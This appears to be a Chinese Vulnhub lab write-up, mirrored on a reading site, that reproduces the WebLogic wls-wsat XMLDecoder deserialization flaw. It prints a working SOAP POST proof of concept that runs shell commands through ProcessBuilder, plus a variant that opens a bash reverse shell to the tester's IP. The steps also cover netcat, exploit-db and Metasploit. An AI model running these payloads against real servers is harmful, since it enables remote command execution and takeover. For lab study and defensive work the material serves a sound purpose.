美文网首页
Vulnhub-Weblogic < 10.3.6 'wls-w

Vulnhub-Weblogic < 10.3.6 'wls-w

作者: M0nkeyK1ng | 来源:发表于2020-08-29 21:38 被阅读0次

    郑重声明:所用漏洞环境为自建虚拟机vulnhub靶机环境,仅供本人学习使用。

    漏洞简述

    Weblogic的WLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令。

    影响版本:10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 ,12.2.1.2.0

    准备环境

    测试机IP:192.168.79.129

    靶机IP:192.168.79.131

    1. 启动Vulnhub靶机环境:

    2. 验证靶机应用启用成功:

    3. 通过nmap扫描确认Weblogic版本

    漏洞复现

    引用:https://github.com/Tom4t0/Tom4t0.github.io/blob/master/_posts/2017-12-22-WebLogic%20WLS-WebServices组件反序列化漏洞分析.md

    POC:

    POST /wls-wsat/CoordinatorPortType11 HTTP/1.1

    Host: 127.0.0.1:7001

    Cache-Control: max-age=0

    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36

    Upgrade-Insecure-Requests: 1

    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8

    Accept-Encoding: gzip, deflate

    Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,zh-TW;q=0.7

    Connection: close

    Content-Type: text/xml

    Content-Length: 777

    <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> 

      <soapenv:Header>

        <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> 

          <java>

            <void class="java.lang.ProcessBuilder">

              <array class="java.lang.String" length="3">

                <void index="0">

                  <string>/bin/sh</string>

                </void> 

                <void index="1">

                  <string>-c</string>

                </void> 

                <void index="2">

                  <string>id > /tmp/chaitin</string>

                </void>

              </array> 

              <void method="start"/>

            </void>

          </java>

        </work:WorkContext>

      </soapenv:Header> 

      <soapenv:Body/>

    </soapenv:Envelope>

    方法一:手工利用

    1.  能够访问/wls-wsat/CoordinatorPortType,确认漏洞存在

    2. 通过Burp拦截

    3. 改包重放,验证成功

    #Request mode改为POST

    #执行反弹命令(反弹shell的语句,需要进行编码)

    <void index="0">

    <string>/bin/bash</string>

    </void>

    <void index="1">

    <string>-c</string>

    </void>

    <void index="2">

    <string>bash -i &gt;&amp; /dev/tcp/192.168.79.129/1234 0&gt;&amp;1</string>

    </void>

    3. 使用NC侦听反弹端口

    4. 放包,得到反弹Shell

    方法二:exploit-db脚本

    1. 修改脚本

    2. 使用NC侦听反弹端口

    3. 执行脚本

    4. 得到反弹Shell

    方法三:使用MSF

    但是未能得到反弹Shell

    发给Burp看下exp

    再执行一下,拦截成功

    改一下包

    使用NC侦听反弹端口

    放包

    得到反弹Shell

    关闭环境

    相关文章

      网友评论

          本文标题:Vulnhub-Weblogic < 10.3.6 'wls-w

          本文链接:https://www.haomeiwen.com/subject/hpmjsktx.html

          延伸阅读

          深度阅读

          • 您也可以注册成为美文阅读网的作者,发表您的原创作品、分享您的心情!

          栏目导航

          热点阅读

          关于我们|服务条款|联系我们|Vulnhub-Weblogic < 10.3.6 'wls-w|投稿指南|网站地图|RSS订阅|排版工具|手机版

          提供经典美文摘抄,优美散文欣赏,现代诗歌精选,短篇小说,心情随笔,表白情书范文,故事会在线阅读欣赏

          Copyright © 2014-2023 Haomeiwen.com All Rights Reserved. 好美文阅读网 版权所有

          备案信息:桂公网安备 45052102000051号 · 桂ICP备13007215号-3

          本站所收录作品、热点评论等信息部分来源互联网,目的只是为了系统归纳学习和传递资讯

          所有作品版权归原创作者所有,与本站立场无关,如不慎侵犯了你的权益,请联系我们告知,我们将做删除处理!